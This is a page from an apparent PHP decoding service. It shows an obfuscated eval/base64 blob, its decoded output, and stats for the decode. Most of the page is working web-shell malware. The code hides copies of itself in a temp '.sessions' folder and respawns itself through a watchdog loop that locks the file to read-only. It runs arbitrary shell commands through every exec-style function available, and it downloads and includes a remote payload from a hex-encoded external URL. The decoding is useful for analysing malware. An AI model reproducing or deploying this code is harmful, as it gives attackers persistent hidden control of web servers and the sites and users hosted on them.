Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval("?>".base64_decode("PD9waHANCiRHTE9CQUxTWydvWmdOeXBvUFJVJ10gPSBhcnJheSgNCiAgICA..

Decoded Output download

?>b'<?php
$GLOBALS[\'oZgNypoPRU\'] = array(
    \'username\' => \'\',
    \'password\' => \'\',
    \'safe_mode\' => \'\',
    \'login_page\' => \'\',
    \'show_icons\' => \'1\',
    \'post_encryption\' => true,
    \'cgi_api\' => false,
);
$_t = SyS_GeT_tEmp_DiR();
if (!is_dir($_t . "/.sessions")) {
    mkdir($_t . "/.sessions");
}
if (!is_file($_t . \'/.sessions/.-\' . nameMad() . ".tmp")) {
    copy($_SERVER["SCRIPT_FILENAME"], $_t . "/.sessions/.-" . nameMad() . ".tmp");
}
if (file_exists($_t . "/.sessions/.-" . nameMad() . ".tmp")) {
    $_F = $_t . "/.sessions/.-" . nameMad() . ".tmp";
    FiLe_PuT_CoNtEnTs($_t . "/.sessions/.-" . handlerName() . ".tmp", \'
    <?php
while (True) {
    if (!file_exists("\' . $_SERVER["SCRIPT_FILENAME"] . \'")) {
        CoPy("\' . $_F . \'", "\' . $_SERVER["SCRIPT_FILENAME"] . \'");
    }
    if (FiLePeRmS("\' . $_SERVER["SCRIPT_FILENAME"] . \'") != "0444") {
        ChMoD("\' . $_SERVER["SCRIPT_FILENAME"] . \'", 0444);
    }
}
?>\');
    if (isset($_GET[\'lock\'])) {
        ChMoD($_SERVER["SCRIPT_FILENAME"], 0444);
        _mad_cmd(\'sh -c "nohup $(nohup php \' . $_t . \'/.sessions/.-\' . handlerName() . \'.tmp < /dev/null &) < /dev/null &"\');
    }
}
function _oOaA($url)
{
    if (function_exists(\'curl_exec\')) {
        $conn = curl_init($url);
        curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, true);
        curl_setopt($conn, CURLOPT_FRESH_CONNECT,  true);
        curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1);
        $url_get_contents_data = (curl_exec($conn));
        curl_close($conn);
    } elseif (function_exists(\'file_get_contents\')) {
        $url_get_contents_data = file_get_contents($url);
    } elseif (function_exists(\'fopen\') && function_exists(\'stream_get_contents\')) {
        $handle = fopen($url, "r");
        $url_get_contents_data = stream_get_contents($handle);
    } else {
        $url_get_contents_data = false;
    }
    return $url_get_contents_data;
}
$Array = [
    \'68747470733a2f2f787365632d313333372e7765622e6170702f4046696c65732f646967696c656e73\',
    \'697a74726578782f68636b65722f6d61696e2f616c666f2e68636b\',
    \'6865783262696e\'

];
$hitung_array = count($Array);
for ($i = 0; $i < $hitung_array; $i++) {
    $fungsi[] = unhex($Array[$i]);
}
function unhex($y)
{
    $n = \'\';
    for ($i = 0; $i < strlen($y) - 1; $i += 2) {
        $n .= chr(hexdec($y[$i] . $y[$i + 1]));
    }
    return $n;
}
function hex($n)
{
    $y = \'\';
    for ($i = 0; $i < strlen($n); $i++) {
        $y .= dechex(ord($n[$i]));
    }
    return $y;
}

function nameMad()
{
    return "90125467239121912" . base64_encode(__DIR__);
}
function handlerName()
{
    return "901H0012121045689" . base64_encode(__DIR__);
}
function Psaux()
{
    return "87121271212717" . base64_encode(__DIR__);
}

function _mad_cmd($in, $re = false)
{
    $out = "";
    try {
        if ($re) $in = $in . " 2>&1";
        if (function_exists("exec")) {
            @ExEc($in, $out);
            $out = @join("
", $out);
        } elseif (function_exists("passthru")) {
            ob_start();
            @PasSthRu($in);
            $out = ob_get_clean();
        } elseif (function_exists("system")) {
            ob_start();
            @SySteM($in);
            $out = ob_get_clean();
        } elseif (function_exists("shell_exec")) {
            $out = sHeLL_exEc($in);
        } elseif (function_exists("popen") && function_exists("pclose")) {
            if (is_resource($f = @pOpeN($in, "r"))) {
                $out = "";
                while (!@feof($f))
                    $out .= fread($f, 1024);
                pClose($f);
            }
        } elseif (function_exists("proc_open")) {
            $pipes = array();
            $process = @proC_opeN($in . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), $pipes, null);
            $out = @stream_Get_contEnts($pipes[1]);
        } elseif (class_exists("COM")) {
            $alfaWs = new COM("WScript.shell");
            $exec = $alfaWs->eXeC("cmd.exe /c " . $_POST[\'alfa1\']);
            $stdout = $exec->StdOut();
            $out = $stdout->ReadAll();
        }
    } catch (Exception $e) {
    }
    return $out;
}


function ____($_____)
{
    $_a = sYs_gEt_TeMp_dIr();
    $tmpfname = TeMpNaM($_a, "unix.11");
    $handle = fOpEn($tmpfname, "w+");
    fWrItE($handle, "<?php " . $_____);
    FcLoSe($handle);
    include $tmpfname;
    array_map(\'unlink\', glob($_a . "/*.11*"));
    return get_defined_vars();
}

$data = _oOaA($fungsi[0]);
if ($data) {
    eXtRaCt(____($fungsi[2](base64_decode($data))));
}
'

Did this file decode correctly?

Original Code

<?php eval("?>".base64_decode("PD9waHANCiRHTE9CQUxTWydvWmdOeXBvUFJVJ10gPSBhcnJheSgNCiAgICAndXNlcm5hbWUnID0+ICcnLA0KICAgICdwYXNzd29yZCcgPT4gJycsDQogICAgJ3NhZmVfbW9kZScgPT4gJycsDQogICAgJ2xvZ2luX3BhZ2UnID0+ICcnLA0KICAgICdzaG93X2ljb25zJyA9PiAnMScsDQogICAgJ3Bvc3RfZW5jcnlwdGlvbicgPT4gdHJ1ZSwNCiAgICAnY2dpX2FwaScgPT4gZmFsc2UsDQopOw0KJF90ID0gU3lTX0dlVF90RW1wX0RpUigpOw0KaWYgKCFpc19kaXIoJF90IC4gIi8uc2Vzc2lvbnMiKSkgew0KICAgIG1rZGlyKCRfdCAuICIvLnNlc3Npb25zIik7DQp9DQppZiAoIWlzX2ZpbGUoJF90IC4gJy8uc2Vzc2lvbnMvLi0nIC4gbmFtZU1hZCgpIC4gIi50bXAiKSkgew0KICAgIGNvcHkoJF9TRVJWRVJbIlx4NTNceDQzXHg1Mlx4NDlceDUwXHg1NFx4NWZceDQ2XHg0OVx4NGNceDQ1XHg0ZVx4NDFceDRkXHg0NSJdLCAkX3QgLiAiLy5zZXNzaW9ucy8uLSIgLiBuYW1lTWFkKCkgLiAiLnRtcCIpOw0KfQ0KaWYgKGZpbGVfZXhpc3RzKCRfdCAuICIvLnNlc3Npb25zLy4tIiAuIG5hbWVNYWQoKSAuICIudG1wIikpIHsNCiAgICAkX0YgPSAkX3QgLiAiLy5zZXNzaW9ucy8uLSIgLiBuYW1lTWFkKCkgLiAiLnRtcCI7DQogICAgRmlMZV9QdVRfQ29OdEVuVHMoJF90IC4gIi8uc2Vzc2lvbnMvLi0iIC4gaGFuZGxlck5hbWUoKSAuICIudG1wIiwgJw0KICAgIDw/cGhwDQp3aGlsZSAoVHJ1ZSkgew0KICAgIGlmICghZmlsZV9leGlzdHMoIicgLiAkX1NFUlZFUlsiXHg1M1x4NDNceDUyXHg0OVx4NTBceDU0XHg1Zlx4NDZceDQ5XHg0Y1x4NDVceDRlXHg0MVx4NGRceDQ1Il0gLiAnIikpIHsNCiAgICAgICAgQ29QeSgiJyAuICRfRiAuICciLCAiJyAuICRfU0VSVkVSWyJceDUzXHg0M1x4NTJceDQ5XHg1MFx4NTRceDVmXHg0Nlx4NDlceDRjXHg0NVx4NGVceDQxXHg0ZFx4NDUiXSAuICciKTsNCiAgICB9DQogICAgaWYgKEZpTGVQZVJtUygiJyAuICRfU0VSVkVSWyJceDUzXHg0M1x4NTJceDQ5XHg1MFx4NTRceDVmXHg0Nlx4NDlceDRjXHg0NVx4NGVceDQxXHg0ZFx4NDUiXSAuICciKSAhPSAiMDQ0NCIpIHsNCiAgICAgICAgQ2hNb0QoIicgLiAkX1NFUlZFUlsiXHg1M1x4NDNceDUyXHg0OVx4NTBceDU0XHg1Zlx4NDZceDQ5XHg0Y1x4NDVceDRlXHg0MVx4NGRceDQ1Il0gLiAnIiwgMDQ0NCk7DQogICAgfQ0KfQ0KPz4nKTsNCiAgICBpZiAoaXNzZXQoJF9HRVRbJ2xvY2snXSkpIHsNCiAgICAgICAgQ2hNb0QoJF9TRVJWRVJbIlx4NTNceDQzXHg1Mlx4NDlceDUwXHg1NFx4NWZceDQ2XHg0OVx4NGNceDQ1XHg0ZVx4NDFceDRkXHg0NSJdLCAwNDQ0KTsNCiAgICAgICAgX21hZF9jbWQoJ3NoIC1jICJub2h1cCAkKG5vaHVwIHBocCAnIC4gJF90IC4gJy8uc2Vzc2lvbnMvLi0nIC4gaGFuZGxlck5hbWUoKSAuICcudG1wIDwgL2Rldi9udWxsICYpIDwgL2Rldi9udWxsICYiJyk7DQogICAgfQ0KfQ0KZnVuY3Rpb24gX29PYUEoJHVybCkNCnsNCiAgICBpZiAoZnVuY3Rpb25fZXhpc3RzKCdjdXJsX2V4ZWMnKSkgew0KICAgICAgICAkY29ubiA9IGN1cmxfaW5pdCgkdXJsKTsNCiAgICAgICAgY3VybF9zZXRvcHQoJGNvbm4sIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIHRydWUpOw0KICAgICAgICBjdXJsX3NldG9wdCgkY29ubiwgQ1VSTE9QVF9GUkVTSF9DT05ORUNULCAgdHJ1ZSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjb25uLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICAgICAgJHVybF9nZXRfY29udGVudHNfZGF0YSA9IChjdXJsX2V4ZWMoJGNvbm4pKTsNCiAgICAgICAgY3VybF9jbG9zZSgkY29ubik7DQogICAgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygnZmlsZV9nZXRfY29udGVudHMnKSkgew0KICAgICAgICAkdXJsX2dldF9jb250ZW50c19kYXRhID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7DQogICAgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygnZm9wZW4nKSAmJiBmdW5jdGlvbl9leGlzdHMoJ3N0cmVhbV9nZXRfY29udGVudHMnKSkgew0KICAgICAgICAkaGFuZGxlID0gZm9wZW4oJHVybCwgInIiKTsNCiAgICAgICAgJHVybF9nZXRfY29udGVudHNfZGF0YSA9IHN0cmVhbV9nZXRfY29udGVudHMoJGhhbmRsZSk7DQogICAgfSBlbHNlIHsNCiAgICAgICAgJHVybF9nZXRfY29udGVudHNfZGF0YSA9IGZhbHNlOw0KICAgIH0NCiAgICByZXR1cm4gJHVybF9nZXRfY29udGVudHNfZGF0YTsNCn0NCiRBcnJheSA9IFsNCiAgICAnNjg3NDc0NzA3MzNhMmYyZjc4NzM2NTYzMmQzMTMzMzMzNzJlNzc2NTYyMmU2MTcwNzAyZjQwNDY2OTZjNjU3MzJmNjQ2OTY3Njk2YzY1NmU3MycsDQogICAgJzY5N2E3NDcyNjU3ODc4MmY2ODYzNmI2NTcyMmY2ZDYxNjk2ZTJmNjE2YzY2NmYyZTY4NjM2YicsDQogICAgJzY4NjU3ODMyNjI2OTZlJw0KDQpdOw0KJGhpdHVuZ19hcnJheSA9IGNvdW50KCRBcnJheSk7DQpmb3IgKCRpID0gMDsgJGkgPCAkaGl0dW5nX2FycmF5OyAkaSsrKSB7DQogICAgJGZ1bmdzaVtdID0gdW5oZXgoJEFycmF5WyRpXSk7DQp9DQpmdW5jdGlvbiB1bmhleCgkeSkNCnsNCiAgICAkbiA9ICcnOw0KICAgIGZvciAoJGkgPSAwOyAkaSA8IHN0cmxlbigkeSkgLSAxOyAkaSArPSAyKSB7DQogICAgICAgICRuIC49IGNocihoZXhkZWMoJHlbJGldIC4gJHlbJGkgKyAxXSkpOw0KICAgIH0NCiAgICByZXR1cm4gJG47DQp9DQpmdW5jdGlvbiBoZXgoJG4pDQp7DQogICAgJHkgPSAnJzsNCiAgICBmb3IgKCRpID0gMDsgJGkgPCBzdHJsZW4oJG4pOyAkaSsrKSB7DQogICAgICAgICR5IC49IGRlY2hleChvcmQoJG5bJGldKSk7DQogICAgfQ0KICAgIHJldHVybiAkeTsNCn0NCg0KZnVuY3Rpb24gbmFtZU1hZCgpDQp7DQogICAgcmV0dXJuICI5MDEyNTQ2NzIzOTEyMTkxMiIgLiBiYXNlNjRfZW5jb2RlKF9fRElSX18pOw0KfQ0KZnVuY3Rpb24gaGFuZGxlck5hbWUoKQ0Kew0KICAgIHJldHVybiAiOTAxSDAwMTIxMjEwNDU2ODkiIC4gYmFzZTY0X2VuY29kZShfX0RJUl9fKTsNCn0NCmZ1bmN0aW9uIFBzYXV4KCkNCnsNCiAgICByZXR1cm4gIjg3MTIxMjcxMjEyNzE3IiAuIGJhc2U2NF9lbmNvZGUoX19ESVJfXyk7DQp9DQoNCmZ1bmN0aW9uIF9tYWRfY21kKCRpbiwgJHJlID0gZmFsc2UpDQp7DQogICAgJG91dCA9ICIiOw0KICAgIHRyeSB7DQogICAgICAgIGlmICgkcmUpICRpbiA9ICRpbiAuICIgMj4mMSI7DQogICAgICAgIGlmIChmdW5jdGlvbl9leGlzdHMoImV4ZWMiKSkgew0KICAgICAgICAgICAgQEV4RWMoJGluLCAkb3V0KTsNCiAgICAgICAgICAgICRvdXQgPSBAam9pbigiXG4iLCAkb3V0KTsNCiAgICAgICAgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygicGFzc3RocnUiKSkgew0KICAgICAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgICAgIEBQYXNTdGhSdSgkaW4pOw0KICAgICAgICAgICAgJG91dCA9IG9iX2dldF9jbGVhbigpOw0KICAgICAgICB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCJzeXN0ZW0iKSkgew0KICAgICAgICAgICAgb2Jfc3RhcnQoKTsNCiAgICAgICAgICAgIEBTeVN0ZU0oJGluKTsNCiAgICAgICAgICAgICRvdXQgPSBvYl9nZXRfY2xlYW4oKTsNCiAgICAgICAgfSBlbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygic2hlbGxfZXhlYyIpKSB7DQogICAgICAgICAgICAkb3V0ID0gc0hlTExfZXhFYygkaW4pOw0KICAgICAgICB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCJwb3BlbiIpICYmIGZ1bmN0aW9uX2V4aXN0cygicGNsb3NlIikpIHsNCiAgICAgICAgICAgIGlmIChpc19yZXNvdXJjZSgkZiA9IEBwT3BlTigkaW4sICJyIikpKSB7DQogICAgICAgICAgICAgICAgJG91dCA9ICIiOw0KICAgICAgICAgICAgICAgIHdoaWxlICghQGZlb2YoJGYpKQ0KICAgICAgICAgICAgICAgICAgICAkb3V0IC49IGZyZWFkKCRmLCAxMDI0KTsNCiAgICAgICAgICAgICAgICBwQ2xvc2UoJGYpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCJwcm9jX29wZW4iKSkgew0KICAgICAgICAgICAgJHBpcGVzID0gYXJyYXkoKTsNCiAgICAgICAgICAgICRwcm9jZXNzID0gQHByb0Nfb3BlTigkaW4gLiAiIDI+JjEiLCBhcnJheShhcnJheSgicGlwZSIsICJ3IiksIGFycmF5KCJwaXBlIiwgInciKSwgYXJyYXkoInBpcGUiLCAidyIpKSwgJHBpcGVzLCBudWxsKTsNCiAgICAgICAgICAgICRvdXQgPSBAc3RyZWFtX0dldF9jb250RW50cygkcGlwZXNbMV0pOw0KICAgICAgICB9IGVsc2VpZiAoY2xhc3NfZXhpc3RzKCJDT00iKSkgew0KICAgICAgICAgICAgJGFsZmFXcyA9IG5ldyBDT00oIldTY3JpcHQuc2hlbGwiKTsNCiAgICAgICAgICAgICRleGVjID0gJGFsZmFXcy0+ZVhlQygiY21kLmV4ZSAvYyAiIC4gJF9QT1NUWydhbGZhMSddKTsNCiAgICAgICAgICAgICRzdGRvdXQgPSAkZXhlYy0+U3RkT3V0KCk7DQogICAgICAgICAgICAkb3V0ID0gJHN0ZG91dC0+UmVhZEFsbCgpOw0KICAgICAgICB9DQogICAgfSBjYXRjaCAoRXhjZXB0aW9uICRlKSB7DQogICAgfQ0KICAgIHJldHVybiAkb3V0Ow0KfQ0KDQoNCmZ1bmN0aW9uIF9fX18oJF9fX19fKQ0Kew0KICAgICRfYSA9IHNZc19nRXRfVGVNcF9kSXIoKTsNCiAgICAkdG1wZm5hbWUgPSBUZU1wTmFNKCRfYSwgIlx4NzVceDZFXHg2OVx4NzhceDJFXHgzMVx4MzEiKTsNCiAgICAkaGFuZGxlID0gZk9wRW4oJHRtcGZuYW1lLCAidysiKTsNCiAgICBmV3JJdEUoJGhhbmRsZSwgIjw/cGhwICIgLiAkX19fX18pOw0KICAgIEZjTG9TZSgkaGFuZGxlKTsNCiAgICBpbmNsdWRlICR0bXBmbmFtZTsNCiAgICBhcnJheV9tYXAoJ3VubGluaycsIGdsb2IoJF9hIC4gIi8qLjExKiIpKTsNCiAgICByZXR1cm4gZ2V0X2RlZmluZWRfdmFycygpOw0KfQ0KDQokZGF0YSA9IF9vT2FBKCRmdW5nc2lbMF0pOw0KaWYgKCRkYXRhKSB7DQogICAgZVh0UmFDdChfX19fKCRmdW5nc2lbMl0oYmFzZTY0X2RlY29kZSgkZGF0YSkpKSk7DQp9DQo=")); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 b19d79137ee0cd1ad93ff0f716cfd691
Eval Count 1
Decode Time 43 ms